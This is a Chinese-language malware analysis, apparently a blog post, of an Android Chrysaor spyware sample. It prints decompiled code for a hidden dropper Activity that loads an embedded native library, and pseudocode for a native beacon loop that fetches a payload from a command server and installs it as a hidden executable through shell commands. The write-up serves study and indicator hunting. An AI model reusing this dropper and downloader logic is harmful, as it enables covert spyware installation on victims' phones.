来源:
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/
3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86
用JEB看是这样一个结构
先看manifest发现用到了超多权限,然后入口是这里
反编译得到其Java代码
package com.network.android;
import android.app.Activity;
import android.os.Bundle;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
// Dropper Activity. As decompiled, it has no UI: onCreate() extracts a native
// library shipped in the APK's assets, writes it into the app's private data
// directory, loads it with System.load(), and finishes immediately.
public class NetworkMain extends Activity {
public NetworkMain() {
super();
}
// Entry point named in the manifest (per the write-up); all the work happens here.
// @param arg8 saved instance state, only forwarded to the superclass.
protected void onCreate(Bundle arg8) {
super.onCreate(arg8);
// Destination of the dropped native payload. This absolute path is a
// useful on-device indicator for this sample.
String v2 = "/data/data/com.network.android/libsgn.so";
try {
// The payload travels inside the APK as an asset named libsgn.so.
InputStream v1 = this.getResources().getAssets().open("libsgn.so");
// Whole asset read in one call sized by available(); the read() return
// value is not checked (decompiler output, left as-is).
byte[] v0 = new byte[v1.available()];
v1.read(v0);
// Staged through a ByteArrayOutputStream before being written to v2.
ByteArrayOutputStream v3 = new ByteArrayOutputStream();
v3.write(v0);
v3.close();
v1.close();
FileOutputStream v4 = new FileOutputStream(v2);
v3.writeTo(((OutputStream)v4));
((OutputStream)v4).close();
// Control passes to native code here (JNI_OnLoad in libsgn.so, see the
// write-up below).
System.load(v2);
}
// Every failure is swallowed silently, so the dropper never surfaces an
// error. Note: this catch ordering (Throwable before its subtypes) would be
// rejected by javac; it is how the decompiler renders the bytecode's
// exception table, not compilable source.
catch(Throwable v5) {
}
catch(Exception v5_1) {
}
catch(IOException v5_2) {
}
// The Activity finishes unconditionally, so no window is ever shown.
this.finish();
}
}
发现并没有界面,直接将assets目录下的.so写入android的这个路径
/data/data/com.network.android/libsgn.so
,然后用
System.load()
加载.so,然后就得转战IDA了。
然而并不会分析,只能看一堆strings
哦对了可以看一下JNI_OnLoad()
发现它调用了fork()
然后main()
!
看到main的代码很牛啊,然而很多不懂的函数
// Native main(), reached from JNI_OnLoad after a fork() according to the
// write-up. Beacon loop: connect to SERVERS, fetch a payload over HTTP with a
// per-iteration random token plus a MAC-derived identifier, write the payload
// to disk as an executable (relocating it to /mnt/obb when /system/csk is
// present), hand it to sub_1CF4, and exit the thread on success; otherwise
// sleep g_sleep_time_in_seconds and retry. This is IDA pseudocode: local
// names, gotos and the extra snprintf arguments are decompiler artefacts.
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
void *v3; // r0@1
int v4; // r5@2
int v5; // r7@6
void *v6; // r5@7
char *v7; // r0@12
const char *v8; // r2@12
const char *v9; // r3@12
char *v10; // [sp+0h] [bp-4A0h]@0
char *v11; // [sp+4h] [bp-49Ch]@0
int v12; // [sp+Ch] [bp-494h]@7
char *v13; // [sp+10h] [bp-490h]@7
int v14; // [sp+1Ch] [bp-484h]@1
int v15; // [sp+20h] [bp-480h]@1
void *ptr; // [sp+24h] [bp-47Ch]@1
int v17; // [sp+28h] [bp-478h]@7
char v18; // [sp+2Ch] [bp-474h]@1
char v19; // [sp+3Ch] [bp-464h]@1
char v20; // [sp+60h] [bp-440h]@1
char s; // [sp+84h] [bp-41Ch]@1
int v22; // [sp+484h] [bp-1Ch]@1
// v14: socket descriptor filled in by socket_connect();
// v15: byte length of the downloaded payload, filled in by http_receive_payload().
v14 = 0;
v15 = 0;
// Stack-protector canary stored by the compiler prologue.
v22 = _stack_chk_guard;
// ptr: heap buffer holding the downloaded payload, released at LABEL_18.
ptr = 0;
// Zero the working buffers: s (0x400) later holds the dropped file's path;
// v19 and v20 (0x21 each = 32 hex digits + NUL) receive hexlified MD5s;
// v18 (0xD) receives the MAC address — sized for 12 characters plus NUL,
// consistent with the 12-byte hash below.
memset(&s, 0, 0x400u);
memset(&v19, 0, 0x21u);
memset(&v18, 0, 0xDu);
v3 = memset(&v20, 0, 0x21u);
// v3 is only memset's return value; presumably handle_signals() ignores it
// (register reuse rendered as an argument by the decompiler).
handle_signals(v3);
// Initial 30 s (0x1E) delay before any network contact; the same global is
// the retry interval at the bottom of the loop.
g_sleep_time_in_seconds = 30;
sleep(0x1Eu);
// Result discarded.
geteuid();
// Beacon loop; the only exit is pthread_exit() after a successful iteration.
while ( 1 )
{
// v4 == 1 marks a fully successful iteration.
v4 = 0;
// unk_600C is presumably the port; it is not resolvable from this listing.
if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
{
// Fresh random token per iteration (v19).
get_random_hexlified_md5(&v19);
// Device identifier (v20): MD5 of the 12-character MAC string — presumably
// used to tie check-ins to a specific handset.
get_mac_address(&v18);
get_hexlified_md5(&v18, &v20, 12);
// GET request carries both values; the response body lands in ptr with its
// length in v15.
if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 )
{
// Second connection to the same server; its descriptor (v12 below) is
// handed to sub_1CF4.
socket_disconnect(&v14);
if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
{
v5 = v15;
v4 = 1;
// Only a non-empty payload is acted on.
if ( v15 > 0 )
{
v12 = v14;
v6 = ptr;
v13 = SERVERS;
// v17 receives whether /system/csk exists; a failed lookup is treated as
// failure (LABEL_17). What /system/csk is cannot be determined from this
// listing; below it is invoked with a quoted shell command as its argument.
v17 = 0;
if ( file_exists("/system/csk", &v17) != 1 )
goto LABEL_17;
if ( v17 )
{
// Payload is staged under the app's data directory, then copied to
// /mnt/obb/.coldboot_init and made executable (0711) through /system/csk
// via system(). The dot-prefixed name and both absolute paths, as well as
// the static command strings, are indicators worth hunting for.
if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1
|| system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1
|| system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )
{
LABEL_17:
v4 = 0;
goto LABEL_18;
}
// The staging copy is removed once relocated, leaving only the /mnt/obb copy.
unlink("/data/data/com.network.android/.coldboot_init");
v7 = &s;
v8 = "%s";
v9 = "/mnt/obb/.coldboot_init";
}
else
{
// Without /system/csk the payload stays at the data-directory path.
if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )
goto LABEL_17;
v7 = &s;
v8 = "%s";
v9 = "/data/data/com.network.android/.coldboot_init";
}
// Format is a bare "%s", so only v9 is consumed; v10 and v11 show up as
// extra arguments because of the decompiler's varargs handling and are not
// initialized at this point.
if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )
goto LABEL_17;
// Stack slots written just before the call; possibly additional
// stack-passed arguments to sub_1CF4 that the decompiler did not attach
// to the call — unverified.
v10 = &v19;
v11 = v13;
// sub_1CF4 is not on this page. It receives the socket, the dropped file's
// path, the /system/csk flag and the device id; presumably it runs or
// supervises the payload. Success (1) ends the loop below.
v4 = sub_1CF4(v12, &s, v17, &v20);
if ( v4 != 1 )
goto LABEL_17;
}
}
}
}
// Common cleanup for every path: release the payload buffer, close the socket.
LABEL_18:
if ( ptr )
{
free(ptr);
ptr = 0;
}
socket_disconnect(&v14);
// A successful iteration ends this thread; main never returns (__noreturn).
if ( v4 == 1 )
pthread_exit(0);
// Retry interval on any failure (30 s unless the global is changed elsewhere).
sleep(g_sleep_time_in_seconds);
}
}